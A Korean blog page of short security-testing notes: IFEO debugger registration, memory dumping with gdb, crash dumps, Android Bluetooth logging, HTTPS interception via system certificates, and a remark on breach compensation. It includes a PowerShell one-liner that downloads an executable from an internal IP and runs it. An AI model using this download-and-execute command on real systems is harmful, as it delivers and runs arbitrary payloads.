Jaden's Note Jaden's Note

1. 윈도우 레지스트리에 디버거 등록 1) 키값 등록 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\타겟.exe 2) 값 등록 이름 : Debugger, 종류 : REG_SZ, 데이터 : Odbg 경로 2. windbg를 이용하여 자식프로세스 디버그 옵션을 이용 File -> Open Executable : 맨 아래 Debug child processes also 체크

COMRaider 사용 visual C++ 6.0 / tstcon32.exe 사용 powershell 을 이용한 파일 다운로드 & 파일 실행 한줄 명령어 cmd.exe /c powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.0.5/dashboard/Client.exe','C:\\abc.exe') & C:\\abc.exe 함수 사용 예시

netstat -tnlp lsof -i -nP

[메모리 덤프] 1. gdb 설치 2. ssh로 연결 > 대상 App의 PI 및 앱 저장경로 확인 (ps -ef | grep Appname) > PID를 이용하여 gdb Attach (gdb -p PID) > break point 설정으로 heap 구역 리턴값 확인 (gdb) b malloc : malloc에 breakpoint 설정 후 breakpoint 된 메모리 주소 확인 (gdb) c : 실행 (gdb) finish (gdb) i r r0 : into register 현재 레지스터 상태 확인 (r0 : return address 확인) (gdb) i mach-region 0x00000000 : 해당 주소의 memory map 및 구역의 속성 확인 (덤프 시작 주소 및 끝 주소 확인) (gdb) d..

개인정보 유출 통지만 하면 다인가? 과징금, 과태료는 제재사항일뿐이다. 개인정보 주체의 피해 보상은 왜 보장되지 않는가? 민사소송 이외에 법적으로 정보주체의 피해보상을 위한 제도가 뒷받침되어야 할 것이다. 2021년 채용 과정에서 담당자 실수로 개인정보 유출 2016년 인터파크 개인정보 유출 카드3사 개인정보 유출 소송이 길어져서 시간낭비라 소송은 하지 않았다. 2014년 카드3사 개인정보 유출 롯데멤버십 카드를 보유하고 있어 개인정보가 유출 되었고 소송까지 진행하였다. 2019년~2020년 쯔음에 최종 판결로 8~9만원 정도 보상을 받았다. 소송비 9000원 정도 써서 5년만에 9만원이면 오히려 시간낭비에 손해가 아닐까 싶다.

1) windbg 설치 https://developer.microsoft.com/ko-kr/windows/downloads/windows-sdk/ Windows SDK - Windows 앱 개발 Windows SDK Windows 11용 Windows SDK(10.0.22000)는 Windows 애플리케이션을 빌드할 수 있는 최신 헤더, 라이브러리, 메타데이터, 도구를 제공합니다. 이 SDK를 사용하여 Windows 11 및 이전 Windows 릴리스용 UWP(유 developer.microsoft.com 2) adplus를 이용하여 crash dump 생성

1. 블루투스 활성화 2. 개발자 옵션 활성화 3. 개발자 옵션에서 Bluetooth HCI 스눕 설정 활성화 4. 블루투스 비활성화 및 다시 활성화 5. 재부팅 6. 개발자 옵션으로 돌아가서 버그리포트 실행 (전체보고서) 7. 로그 파일 확인 (버전별로 경로가 상이할 수 있음) - /data/misc/bluetooth/logs/btsnoop_hci.log - /data/log/bt/btsnoop_hci.log 이후, Wireshark를 이용하여 로그 오픈 및 분석

안드로이드 7.0 이상부터는 sd카드에 넣어서 인증서 설치가 불가능합니다. https 트래픽을 조작하기 위해서는 시스템 인증서에 넣어주어야 하기 때문에 아래와 같은 방식으로 진행해야합니다. 1) openssl for windows 설치 (Binaries - OpenSSLWiki) Binaries - OpenSSLWiki Some people have offered to provide OpenSSL binary distributions for selected operating systems. The condition to get a link here is that the link is stable and can provide continued support for OpenSSL for a while. No..